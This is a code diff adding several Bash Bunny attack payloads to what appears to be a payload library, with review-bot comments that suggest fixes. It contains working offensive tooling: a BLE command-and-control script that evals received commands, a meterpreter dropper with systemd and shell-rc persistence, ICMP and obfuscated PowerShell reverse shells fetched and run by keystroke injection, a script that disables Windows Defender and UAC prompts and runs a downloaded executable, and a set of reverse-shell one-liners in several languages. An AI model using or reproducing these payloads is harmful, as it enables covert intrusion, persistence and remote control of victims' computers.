@@ -0,0 +1,63 @@
#!/bin/bash
#
# Title: BlueBunny
# Description: BLE based C2 server for the Bash Bunny Mark II
# Author: 90N45
# Version: 1.0
# Category: Remote
# Attackmodes: NONE (Custom)
LED SETUP
# Enable serial BLE module
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
sleep 1
# Configure BLE module as slave
echo -n -e "AT+ROLE=0" > /dev/ttyS1
echo -n -e "AT+NAME=BlueBunny" > /dev/ttyS1
echo -n -e "AT+ADV=1" > /dev/ttyS1
echo -n -e "AT+RESET" > /dev/ttyS1
LED FINISH
while [[ true ]]; do
# Get incomming data from serial port
data=$(head -1 /dev/ttyS1)
# Decode base64 encoded data
data=$(echo ${data} | base64 -d)
# Echo data for debugging
echo "Debugger: ${data}"
# Single command
if [[ $data =~ "<CMD>" ]]; then
# Extract command
command=${data#*<CMD>}
command=${command%%<CMD>*}
# Run recieved command
eval "${command}"
fi
# Payload file
if [[ $data =~ "<PAYLOAD>" ]]; then
# Set payload file name
file="BlueBunnyPayload-${RANDOM}.txt"
# Extract file content
content=${data#*<PAYLOAD>}
content=${content%%<PAYLOAD>*}
# Write content to file
printf "${content}" > "${file}";
# Run payload
bash $file
# Remove payload file
rm $file
fi
done
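Review bot: `printf "${content}" > "${file}"` uses the received payload as the printf format string, so any `%` or backslash sequence in an uploaded script is interpreted (a bare `%` makes printf fail) and what lands in the file is not what was uploaded; write it as `printf '%s' "${content}" > "${file}"`. `bash $file` and `rm $file` are unquoted and `file` is created in whatever the current directory happens to be; `bash "${file}"` / `rm -f "${file}"` (ideally with the path from `mktemp`) are the safer forms, and `echo ${data} | base64 -d` should quote `"${data}"` as well. Every line that arrives on `/dev/ttyS1` is base64-decoded and then `eval`ed or run with `bash`, and the module is configured with `AT+ROLE=0`/`AT+ADV=1` with no pairing or authentication visible in this file, so anyone within BLE range who can write to the characteristic gets command execution on the Bunny — that is the tool's purpose, but the header should state it, e.g. `# WARNING: commands are accepted from any BLE peer that connects; there is no authentication on this channel`. The duplicated `stty` line and `while [[ true ]]` (which tests a non-empty string rather than running `true`) are minor style points; `while true; do` is the idiom.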


@@ -0,0 +1,36 @@
## About:
* Title: LinuxPreter
* Description: Injects meterpreter payload and makes it persistent.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Remote Access
* Target: Unix-like operating systems with systemd.
* Attackmodes: HID, Storage
## LinuxPreter injects meterpreter payload, make it persistent and triggers payload on launch of terminal/shell.
### Workflow:
* Keeping tracks clear by preventing storage of history.
* Fetching BashBunny's block device and mounting it.
* Transfering payload script and payload itself.
* Deleting scripts from victims machine and unmounting bunny.
### Create Meterpreter payload:
* ```msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP ADDRESS> LPORT=<PORT NO> -f elf -o sysHandle.bin```
* NOTE: Only change IP address and Port number in the above command.
### LED Status:
* `SETUP` : MAGENTA
* `ATTACK` : YELLOW
* `FINISH` : GREEN
### Directory Structure of payload components:
| FileName | Directory |
| -------------- | ----------------------------- |
| payload.txt | /payload/switch1/ |
| payload.sh | /payload/ |
| sysHandle.bin | /tools/ |
#### Support me if you like my work:
* https://twitter.com/drapl0n


@@ -0,0 +1,12 @@
lol=$(lsblk | grep 1.8G)
disk=$(echo $lol | awk '{print $1}')
mntt=$(lsblk | grep $disk | awk '{print $7}')
mkdir /var/tmp/.system
cp -r $mntt/tools/sysHandle.bin /var/tmp/.system
chmod +x /var/tmp/.system/sysHandle.bin
mkdir -p ~/.config/systemd/user/
systemctl --user start systemPer.service
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/var/tmp/.system/./sysHandle.bin -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=default.target" > ~/.config/systemd/user/systemPer.service
echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now systemPer.service \" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now systemPer.service\" >> ~/.bashrc\nfi" > ~/tmmmp
chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit
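Review bot: This payload.sh has no shebang and no header comment, while the persistentReverseBunny payload.sh in this commit starts with `#!/bin/bash` and the other payload.txt files open with the standard `# Title / Description / Author / Version / Category` block; the LinuxPreter and persistentReverseBunny payload.txt files likewise omit the `#!/bin/bash` line. Add `#!/bin/bash` as the first line and a header that states what the script writes (`/var/tmp/.system`, the user unit, the rc-file edits) so a reader of the library can tell from the top what it does.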


@@ -0,0 +1,56 @@
# Title: LinuxPreter
# Description: Injects meterpreter payload and makes it persistent.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Remote Access
# Target: Unix-like operating systems with systemd.
# Attackmodes: HID, Storage
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [transfering payload script]
Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
Q ENTER
Q STRING chmod +x /tmp/payload.sh
Q ENTER
Q STRING /tmp/./payload.sh
Q ENTER
Q DELAY 1000
Q STRING rm /tmp/payload.sh
Q ENTER
Q DELAY 500
# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH


@@ -0,0 +1,74 @@
#!/usr/bin/env perl
#
# icmpsh - simple icmp command shell
# Copyright (c) 2010, Nico Leidecker <nico@leidecker.info>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Modified by 0i41E for PingZhellBunny
#
#
#
#
use strict;
use IO::Socket;
use NetPacket::IP;
use NetPacket::ICMP qw(ICMP_ECHOREPLY ICMP_ECHO);
use Net::RawIP;
use Fcntl;
print "Loading PingZhellBunny...\n";
# create raw socket
my $sock = IO::Socket::INET->new(
Proto => "ICMP",
Type => SOCK_RAW,
Blocking => 1) or die "$!";
# set stdin to non-blocking
fcntl(STDIN, F_SETFL, O_NONBLOCK) or die "$!";
#Unnecessary print output - just for fun
sleep(2);
print ". .\n";
sleep(1);
print ". . .";
sleep(1);
print ". . . .";
sleep(2);
print "PingZhellBunny client ready!\n";
my $input = '';
while(1) {
if ($sock->recv(my $buffer, 4096, 0)) {
my $ip = NetPacket::IP->decode($buffer);
my $icmp = NetPacket::ICMP->decode($ip->{data});
if ($icmp->{type} == ICMP_ECHO) {
# get identifier and sequencenumber
my ($ident,$seq,$data) = unpack("SSa*", $icmp->{data});
# write data to stdout and read from stdin
print $data;
$input = <STDIN>;
# compile and send response
$icmp->{type} = ICMP_ECHOREPLY;
$icmp->{data} = pack("SSa*", $ident, $seq, $input);
my $raw = $icmp->encode();
my $addr = sockaddr_in(0, inet_aton($ip->{src_ip}));
$sock->send($raw, 0, $addr) or die "$!\n";
}
}
}
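Review bot: `use Net::RawIP;` is loaded but never used — the socket is created with IO::Socket::INET and packets are decoded with NetPacket — and the README's dependency list does not mention it, so the script dies at startup on a machine set up exactly as the README says; drop that line or add the module to the README. The receive loop also replies to every ICMP echo request that reaches the host without looking at `$ip->{src_ip}`, so a ping from any host reads from STDIN and gets that data back; a comment such as `# no source filtering: any echo request received here is answered with the next STDIN read` would make that explicit for the operator.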


@@ -0,0 +1,10 @@
$Delay=5;
$BufferSize=128;
$ICMPBunny=New-Object System.Net.NetworkInformation.Ping;
$PingBB=New-Object System.Net.NetworkInformation.PingOptions;
$PingBB.DontFragment = $True;$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('Bunny@PS '+(gl).Path+'> ');
$ICMPBunny.Send($IP,60 * 1000, $NeverGonnaGiveYouUp, $PingBB) | Out-Null;while ($true){$NeverGonnaGiveYouUp=([text.encoding]::ASCII).GetBytes('');
$reply=$ICMPBunny.Send($IP,60 * 1000, $NeverGonnaGiveYouUp, $PingBB);if ($reply.Buffer){$response=([text.encoding]::ASCII).GetString($reply.Buffer);
$result=(Invoke-eXprEssIon -Command $response 2>&1 | Out-String );$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($result);$index=[math]::floor($NeverGonnaGiveYouUp.length/$BufferSize);$i = 0;if($NeverGonnaGiveYouUp.length -gt $BufferSize){while ($i -lt $index ){$NGGYU2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..(($i+1)*$BufferSize-1)];$ICMPBunny.Send($IP,60 * 10000, $NGGYU2, $PingBB) | Out-Null;$i +=1;};
$remainingindex=$NeverGonnaGiveYouUp.Length % $BufferSize;if($remainingindex -ne 0){$NGGYU2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..($NeverGonnaGiveYouUp.Length)];$ICMPBunny.Send($IP,60 * 10000, $NGGYU2, $PingBB) | Out-Null}}else{$ICMPBunny.Send($IP,60 * 10000, $NeverGonnaGiveYouUp, $PingBB) | Out-Null};$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes("`nO.MG@PS " + (pwd).Path + '> ');
$ICMPBunny.Send($IP,60 * 1000, $NeverGonnaGiveYouUp, $PingBB) | Out-Null}else{Start-Sleep -Seconds $Delay}}
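Review bot: The prompt written after each command still reads `O.MG@PS `, while the initial prompt uses `Bunny@PS `, apparently a leftover from the O.MG-cable version of this script; make the two consistent. `$IP` is used throughout without being defined in this file (payload.txt sets it via `Q STRING "\$IP = '0.0.0.0';"`), which deserves a leading comment such as `# expects $IP to be defined by the caller (payload.txt)`.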


@@ -0,0 +1,41 @@
**Title: PingZhellBunny**
<p>Author: 0i41E<br>
OS: Windows<br>
Version: 1.5<br>
**What is PingZhellBunny?**
#
*Imagine a scenario in which communication to and from the server is protected and filtered by a firewall and does not allow TCP shell communication to take place on any listening port (both reverse and bind TCP connection).*
*But many environments allow ping requests to be sent and received. Ping requests work on the ICMP protocol.*
*ICMP stands for Internet Control Message Protocol; it is used by network devices query and error messages. ICMP differs from the widely used TCP and UDP protocols because ICMP is not used for transferring data between network devices.*
*When a device wants to test connectivity to another device, it uses the PING tool (ICMP communication) to send an ECHO REQUEST and waits for an ECHO RESPONSE.*
*The client ICMP agent listens for ICMP packets from a specific host and uses the data in the packet for command execution.*
*The server ICMP agent (Bunny.pl) sends ICMP packets to connect to the victim running a custom ICMP agent (PingZhellBunny input) and sends it commands to execute.*
#
There you go, a reverse shell without the usage of ports.
**Instruction:**
Upload Bunny.pl onto your attacking machine.
Install dependencies, if needed:
- IO::Socket
- NetPacket::IP
- NetPacket::ICMP
Disable ICMP replies by the OS:
`sysctl -w net.ipv4.icmp_echo_ignore_all=1`
Start the client -> `perl Bunny.pl`
<p>!!!Insert the IP of your attacking machine into the payload.txt variable $IP & Load PingZhellBunny.ps1 onto your Bunny!!!<br>
<p>Plug in your BashBunny.<br>
Achieve reverse shell.<br>
run away <3</p>
Credit for code and ideas:
- bdamele
- Nikhil Mittal
- krabelize


@@ -0,0 +1,44 @@
#!/bin/bash
#
# Title: PingZhellBunny
# Description: Getting remote access via ICMP
# Author: 0i41E
# Version: 1.5
# Category: Remote_Access
# Attackmodes: HID, RNDIS_ETHERNET
LED SETUP
ATTACKMODE RNDIS_ETHERNET HID
GET SWITCH_POSITION
GET HOST_IP
cd /root/udisk/payloads/$SWITCH_POSITION/
# starting server
LED SPECIAL
# disallow outgoing dns requests so the server is accessible immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
#Opens hidden powershell instance
Q DELAY 1500
Q GUI r
Q DELAY 500
Q STRING "powershell -NoP -NonI -w h"
Q DELAY 500
Q ENTER
Q DELAY 500
#Insert attacking IP
Q STRING "\$IP = '0.0.0.0';"
Q DELAY 250
Q STRING "iex (New-Object Net.WebClient).DownloadString(\"http://$HOST_IP/PingZhellBunny.ps1\")"
Q DELAY 400
Q ENTER
LED FINISH
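Review bot: The `iptables -A OUTPUT -p udp --dport 53 -j DROP` rule is appended on every run and never removed, and the background `python -m SimpleHTTPServer 80 &` is never stopped before `LED FINISH`, so both outlive the payload on the Bunny; the ReverseBunny and ReverseBunnySSL payload.txt files in this commit have the same pattern. `SimpleHTTPServer` is the Python 2 module name, so this presumably relies on the firmware shipping Python 2 — worth a comment next to that line. Either add a cleanup stage (`iptables -D ...` for the rule, `kill` of the server's PID) or a comment stating that leaving them in place is intentional.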


@@ -0,0 +1,15 @@
**Title: ReverseBunny**
<p>Author: 0i41E<br>
OS: Windows<br>
Version: 1.5<br>
<p>!Getting remote access via obfuscated reverse shell!<br>
Upload payload.txt and RevBunny.ps1 onto your Bunny
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunny/RevBunny.png)
Change the variables in payload.txt to your attacking machine & start your listener. (for example netcat: nc -lvnp [PORT] )</p>
A pressed CAPSLOCK key as also an indicator light on the bunny will indicate the payloads successfull execution

Binary file not shown.




@@ -0,0 +1,25 @@
.("{1}{0}" -f't','SE') ("mAI"+"h") ([tYpE]("{1}{0}"-F'Y','ArrA')) ; &("{0}{3}{1}{2}"-f 'se','r','IABLe','t-vA') eU92 ([TYPE]("{0}{1}" -F'sT','RiNG') );.("{0}{1}"-f 'S','et') (("{1}{0}" -f 'W','f83')+'R'+'0') ( [cHaR[ ]]" ))63]rahc[]GNirTs[,'Pou'(ECalPEr.)'\',)88]rahc[+27]rahc[+97]rahc[((ECalPEr.)93]rahc[]GNirTs[,'4EC'(ECalPEr.)'|',)711]rahc[+86]rahc[+76]rahc[((ECalPEr.)43]rahc[]GNirTs[,)28]rahc[+001]rahc[+911]rahc[((ECalPEr.)'
TIXE;)(ESolC.cPou;'+'})(hSUlF.sPou;)hTGnEL.yPou,0,yPou(etIrW.sPou;)xPou(sETyBtEG.)IICSA::]gnidocne.txet[(='+'yPou;Rdw >Rdw+)'+'noitacoL-te'+'G(+Rdw SP@yn'+'nuBRdw+zPou=xPou;)GNirTS-'+'tUouDC1&>2 dPou Xei(=zPou;)iPo'+'u,0,bPou(gnIRtSteG.)gnidocnEIICSA.tXeT.MeTsYs EmaNepYT'+'- TCejBO-wEN(=dPou;{)0 en-)'+')hTgNeL.bP'+'ou,0,bPou(daER.sPou=iPou((eLIhw;}0{%uDC53556..0=bPou]][etyb[;)htgneL'+'.trA'+'ynnuBveRPou,0,trAynnuBveRPou(etirw.sPou;)(mAerTSteG.cPou=sPou;)PPou,IPou(tnE'+'IlCPCT.stEKcOS.tEN.mEtsYS tCEjBo-wEn=c'+'Pou
)4EC}KCOLSPAC{4EC(syeKdneS.hswPo'+'u
;)ynnubPou(setyBteG.IICSA::]gnidocnE'+'.txeT[ = trAynnuBveRPou
llehS.tpircSW tcejbOmoC- tcejbO-we'+'N = hswPou
;@Rdw
...eunitnoc ot ]ret'+'nE[ sserP
/___uDC 31rohpi0 yB '+'
uDC /__ '+' '+'
uDC ,__XHOuDC_u'+'DC uDC_'+'uDC_uDC uDC_uDC_,__XHO /____XHO___XHO/___uDC uDC_uDC___'+'XHO /_XHO uDC___XHO_'+'XHO uDC_XHO
uDC uDC_uDC uDC uDC uDC uDC uD'+'C uDC uDC uDC_uDC'+' uDC /_uDC uDC'+'__ uDC __XHO uDC uDC__ uDC V XHO/__ uDC XHOuDC uDC
uDC u'+'DC uDC uDCXHO _4EC uDCXHO _4E'+'C uDC uDC uDC '+'uDC ___ uDC _ /uDC_'+'_ /__4EC uDC _ / / XHO XHO _ // uDC
_ _ __ _ __ _ _ _/ /_uDC '+'uDC___ ___ __ _ _____ '+'_____/ /_uDC uDC
XHO ___ uDC '+' '+' XHO'+' _'+'__ uDC'+'
______'+' '+' ______
)Rdw(_)Rdw(
)=4EC.4EC=(
)/___XHO(
Rdw@=ynnub'+'Pou'((xEI " ) ; ( .("{1}{2}{0}" -f '-ITEM','G','Et') ('VAR'+'IABLe:'+'M'+'aiH')).vaLue::("{1}{0}"-f'se','reVer').Invoke(( &('Gi') (("{3}{2}{1}{0}" -f ':f','ABLE','RI','VA')+'83w'+'R0'))."v`AlUe" ) ; (.("{0}{2}{1}"-f 'vA','E','RIaBl') eu92 -VaL)::("{0}{1}" -f'Joi','N').Invoke('' ,( &('Gi') (("{2}{1}{0}" -f':f','E','VARIABL')+'83w'+'R0'))."Val`Ue") |&("{1}{0}" -f 'EX','I')


@@ -0,0 +1,44 @@
#!/bin/bash
#
# Title: ReverseBunny
# Description: Get remote access, using an obfuscated powershell reverse shell.
# Author: 0i41E
# Version: 1.5
# Category: Remote_Access
# Attackmodes: HID, RNDIS_ETHERNET
LED SETUP
ATTACKMODE RNDIS_ETHERNET HID
GET SWITCH_POSITION
GET HOST_IP
cd /root/udisk/payloads/$SWITCH_POSITION/
# starting server
LED SPECIAL
# disallow outgoing dns requests so the server is accessible immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
#Opens hidden powershell instance
Q DELAY 1500
Q GUI r
Q DELAY 500
Q STRING "powershell -NoP -NonI -w h"
Q DELAY 500
Q ENTER
Q DELAY 500
#Insert attacking IP & Port below
Q STRING "\$I='0.0.0.0';\$P=4444;"
Q DELAY 250
Q STRING "iex (New-Object Net.WebClient).DownloadString(\"http://$HOST_IP/RevBunny.ps1\")"
Q DELAY 400
Q ENTER
LED FINISH

File diff suppressed because one or more lines are too long


@@ -0,0 +1,30 @@
**Title: ReverseBunnySSL**
<p>Author: 0i41E<br>
OS: Windows<br>
Version: 1.2<br>
For input and inspiration - Thanks to: Cribbit, sebkinne</p>
**What is ReverseBunnySSL?**
#
<p>ReverseBunnySSL gets you remote access to your target in seconds.<br>
Unlike ReverseBunny, ReverseBunnySSL offers encrypted traffic via OpenSSL.</p>
**Instruction:**
<p>!Insert the IP of your attacking machine & PORT into the payload.txt!<br>
1. Create key.pem & cert.pem like so: <br>
> openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes<br>
It will ask for information about the certificate - Insert whatever you want.<br>
2. For catching the shell you need to start a listener, which supports encrypted traffic.<br>
I recommend openssl itself or ncat - Example syntax for both:<br>
> `openssl s_server -quiet -key key.pem -cert cert.pem -port [Port Number]` <br>
> `ncat --listen -p [Port Number] --ssl --ssl-cert cert.pem --ssl-key key.pem`</p>
3. Plug in Bunny, it will create a web server, and uses Invoke-Expression to execute the shell.
**Disclaimer: Because of obfuscation, it may take some time until the shell is fully executed by powershell**
![alt text](https://github.com/0i41E/omg-payloads/blob/master/payloads/library/remote_access/ReverseCableSSL/CreateCert.png)
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/remote_access/ReverseBunnySSL/Startscreen.png)

Binary file not shown.




@@ -0,0 +1,44 @@
#!/bin/bash
#
# Title: ReverseBunnySSL
# Description: Get remote access, using an obfuscated powershell reverse shell.
# Author: 0i41E
# Version: 1.2
# Category: Remote_Access
# Attackmodes: HID, RNDIS_ETHERNET
LED SETUP
ATTACKMODE RNDIS_ETHERNET HID
GET SWITCH_POSITION
GET HOST_IP
cd /root/udisk/payloads/$SWITCH_POSITION/
# starting server
LED SPECIAL
# disallow outgoing dns requests so the server is accessible immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
#Opens hidden powershell instance
Q DELAY 1500
Q GUI r
Q DELAY 500
Q STRING "powershell -NoP -NonI -w hidden"
Q DELAY 500
Q ENTER
Q DELAY 500
#Insert attacking IP & port below
Q STRING "\$I='0.0.0.0';\$P=4444;"
Q DELAY 250
Q STRING "iex (New-Object Net.WebClient).DownloadString(\"http://$HOST_IP/RBSSL.ps1\")"
Q DELAY 200
Q ENTER
LED FINISH


@@ -0,0 +1,85 @@
#!/bin/bash
#
# Title: Microsoft Windows Payload Injector
#
# Description:
# 1) Disables Tamper Protection in Windows Defender.
# 2) Disables UAC / Turns UAC off
# 3) Creates Payload Directory in C:/ Drive
# 4) Disables Real-Time Protection in Windows Defender.
# 5) Adds the Payload Directory as an exclusion in Windows Defender
# 6) Downloads Payload from Specified URI (Enter in Variable Below)
# 7) Runs Payload on System
#
# Author: KryptoKola
# Version: 1.0
# Category: Remote Access
# Target: Microsoft Windows 10 & 11
LED SETUP
ATTACKMODE HID
#Variables
readonly PAYLOAD_DOWNLOAD_URI="ENTER PAYLOAD URI HERE"
#Disables Tamper Protection in Windows 10 & 11
LED STAGE1
Q GUI s
Q STRING "Virus & threat protection"
Q ENTER
Q DELAY 10000
Q TAB
Q TAB
Q TAB
Q TAB
Q ENTER
Q DELAY 1000
Q TAB
Q TAB
Q TAB
Q TAB
Q SPACE
Q DELAY 1000
Q ALT y
Q DELAY 1000
Q ALT F4
Q FN ALT F4
#Starts Powershell in Admin mode
LED STAGE2
Q GUI r
Q DELAY 250
Q STRING powershell Start-Process powershell -Verb runAs
Q ENTER
Q DELAY 3000
Q ALT y
Q DELAY 5000
#Disables UAC, Creates Payload Directory, and moves to C:/ directory in powershell
LED STAGE3
Q STRING "cd C:/;mkdir Payloads;Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;"
Q ENTER
Q DELAY 1500
Q ALT y
Q DELAY 250
#Disables Real Time Protection, Makes an exclusion to the Payloads folder in Windows Defender, Navigates to the Payloads folder, then Downloads specified payload from URI.
LED STAGE4
Q STRING "Set-MpPreference -DisableRealtimeMonitoring 1;Set-MpPreference -ExclusionPath "C:/Payloads";cd C:/Payloads;Start-BitsTransfer -Source ${PAYLOAD_DOWNLOAD_URI} -Destination ./payload.exe;"
Q ENTER
Q DELAY 2000
#Launches the Payload on the machine
LED STAGE5
Q STRING ./payload.exe
Q ENTER
Q DELAY 250
#Clears the shell and exits out.
LED CLEANUP
Q STRING clear
Q ENTER
Q DELAY 250
Q STRING exit
Q ENTER
LED FINISH
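Review bot: The header's step 2 says "Disables UAC / Turns UAC off", but the only registry change in STAGE3 sets `ConsentPromptBehaviorAdmin` to 0, which alters the admin consent prompt behaviour rather than turning UAC off; the description should say what the script actually does. On the STAGE4 `Q STRING` line the inner `"C:/Payloads"` quotes are consumed by bash (they close and reopen the double-quoted argument), so PowerShell receives the path unquoted — it only works because the path has no spaces; escape them as `\"C:/Payloads\"`, as the other payloads in this commit do. `Q FN ALT F4` right after `Q ALT F4` is also unexplained; a comment on why the second key combination is needed would help.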


@@ -0,0 +1,32 @@
# Random Reverse Shell
- Title: Random Reverse Shell
- Author: TW-D
- Version: 1.0
- Target: Linux
- Category: Remote Access
## Description
1) Checks the availability of binaries on the system.
2) Builds a list of possible payloads.
3) Performs one at random.
## Configuration
From "payload.txt" change the values of the following constant :
```bash
######## INITIALIZATION ########
readonly BB_LABEL="BashBunny"
readonly REMOTE_HOST="127.0.0.1"
readonly REMOTE_PORT=54424
```
## Usage
```
hacker@hacker-computer:~$ nc -lnvvp <REMOTE_PORT>
```


@@ -0,0 +1,85 @@
#!/bin/bash
#
# Title: Random Reverse Shell
#
# Description:
# 1) Checks the availability of binaries on the system.
# 2) Builds a list of possible payloads.
# 3) Performs one at random.
#
# Author: TW-D
# Version: 1.0
# Category: Remote Access
# Target: Linux
# Attackmodes: HID and STORAGE
#
# TESTED ON
# ==========
# Ubuntu 20.04.4 LTS x86_64 (Xfce)
#
# STATUS
# ===============
# Magenta solid ................................... SETUP
# Yellow single blink ............................. ATTACK
# Yellow double blink ............................. STAGE2
# Yellow triple blink ............................. STAGE3
# Yellow quadruple blink .......................... STAGE4
# White fast blink ................................ CLEANUP
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH
######## INITIALIZATION ########
readonly BB_LABEL="BashBunny"
readonly REMOTE_HOST="127.0.0.1"
readonly REMOTE_PORT=54424
######## SETUP ########
LED SETUP
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
udisk mount
######## ATTACK ########
LED ATTACK
Q DELAY 7000
Q CTRL-ALT t
Q DELAY 5000
LED STAGE2
Q STRING " cd /media/\${USER}/${BB_LABEL}/payloads/${SWITCH_POSITION}/"
Q ENTER
Q DELAY 1500
LED STAGE3
Q STRING " chmod +x ./random_reverse-shell.sh"
Q ENTER
Q DELAY 1500
Q STRING " \$BASH ./random_reverse-shell.sh ${REMOTE_HOST} ${REMOTE_PORT}"
Q ENTER
Q DELAY 3000
LED STAGE4
Q STRING " exit"
Q ENTER
Q DELAY 1000
######## CLEANUP ########
LED CLEANUP
sync
udisk unmount
######## FINISH ########
LED FINISH
shutdown -h 0


@@ -0,0 +1,126 @@
#!/bin/bash
#
# Title: Random Reverse Shell
#
# Description:
# 1) Checks the availability of binaries on the system.
# 2) Builds a list of possible payloads.
# 3) Performs one at random.
#
# Author: TW-D
# Version: 1.0
# Category: Remote Access
# Target: Linux
# Attackmodes: HID and STORAGE
#
# TESTED ON
# ==========
# Ubuntu 20.04.4 LTS x86_64 (Xfce)
#
# USAGE
# ==========
# hacker@hacker-computer:~$ nc -lnvvp <REMOTE_PORT>
# victim@victim-computer:~$ $BASH ./random_reverse-shell.sh <REMOTE_HOST> <REMOTE_PORT>
#
set -eo pipefail
readonly REMOTE_HOST="${1}"
readonly REMOTE_PORT="${2}"
readonly RANDOM_FILENAME="${RANDOM}"
readonly BINARIES_LIST=(
"/bin/bash"
"/bin/mkfifo"
"/bin/cat"
"/bin/nc"
"/bin/perl"
"/bin/php"
"/bin/python"
"/bin/ruby"
"/bin/sh"
"/bin/mknod"
"/bin/telnet"
)
readonly BASH_PAYLOAD=$(cat <<EOF
/bin/bash -i > /dev/tcp/${REMOTE_HOST}/${REMOTE_PORT} 0<&1 2>&1
EOF
)
#
# [CTRL + c]
#
readonly NC_PAYLOAD=$(cat <<EOF
/bin/mkfifo /tmp/${RANDOM_FILENAME} && /bin/cat /tmp/${RANDOM_FILENAME} | ${BASH} -i 2>&1 | /bin/nc ${REMOTE_HOST} ${REMOTE_PORT} > /tmp/${RANDOM_FILENAME}
EOF
)
#
# Tested on Perl v5.30.0
# [CTRL + c]
#
readonly PERL_PAYLOAD=$(cat <<EOF
/bin/perl -X -MIO -e '\$socket = new IO::Socket::INET(PeerAddr, "${REMOTE_HOST}:${REMOTE_PORT}"); STDIN->fdopen(\$socket, "r"); ($~)->fdopen(\$socket, "w"); system(\$_) while<>'
EOF
)
#
# Tested on PHP v7.4.3
#
readonly PHP_PAYLOAD=$(cat <<EOF
/bin/php -r '\$fsockopen = fsockopen("${REMOTE_HOST}", ${REMOTE_PORT}); exec("${BASH} -i <&3 >&3 2>&3");'
EOF
)
#
# Tested on Python v2.7.18
#
readonly PYTHON_PAYLOAD=$(cat <<EOF
/bin/python -c 'import socket, os, subprocess; tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM); tcp_socket.connect(("${REMOTE_HOST}", ${REMOTE_PORT})); os.dup2(tcp_socket.fileno(), 0); os.dup2(tcp_socket.fileno(), 1); os.dup2(tcp_socket.fileno(), 2); subprocess.call(["${BASH}", "-i"])'
EOF
)
#
# Tested on Ruby v2.7.0p0
#
readonly RUBY_PAYLOAD=$(cat <<EOF
/bin/ruby -rsocket -e 'tcp_socket = TCPSocket.new("${REMOTE_HOST}", ${REMOTE_PORT}); while (command = tcp_socket.gets); command = (command.chomp).downcase; (command == "exit") ? break : tcp_socket.puts(\`#{command}\`) rescue nil; end; tcp_socket.close'
EOF
)
readonly SH_PAYLOAD=$(cat <<EOF
/bin/sh -i > /dev/tcp/${REMOTE_HOST}/${REMOTE_PORT} 0<&1 2>&1
EOF
)
readonly TELNET_PAYLOAD=$(cat <<EOF
/bin/mknod /tmp/${RANDOM_FILENAME} p && /bin/telnet ${REMOTE_HOST} ${REMOTE_PORT} 0</tmp/${RANDOM_FILENAME} | ${BASH} 1>/tmp/${RANDOM_FILENAME}
EOF
)
set -u
available_binaries=()
for binary in "${BINARIES_LIST[@]}"; do
if command -v "${binary}" > /dev/null 2>&1; then
available_binaries+=("${binary}")
fi
done
available_payloads=()
[[ "${available_binaries[*]}" =~ "/bin/bash" ]] && available_payloads+=("${BASH_PAYLOAD}") || echo ""
[[ "${available_binaries[*]}" =~ "/bin/mkfifo" && "${available_binaries[*]}" =~ "/bin/cat" && "${available_binaries[*]}" =~ "/bin/nc" ]] && available_payloads+=("${NC_PAYLOAD}") || echo ""
[[ "${available_binaries[*]}" =~ "/bin/perl" ]] && available_payloads+=("${PERL_PAYLOAD}") || echo ""
[[ "${available_binaries[*]}" =~ "/bin/php" ]] && available_payloads+=("${PHP_PAYLOAD}") || echo ""
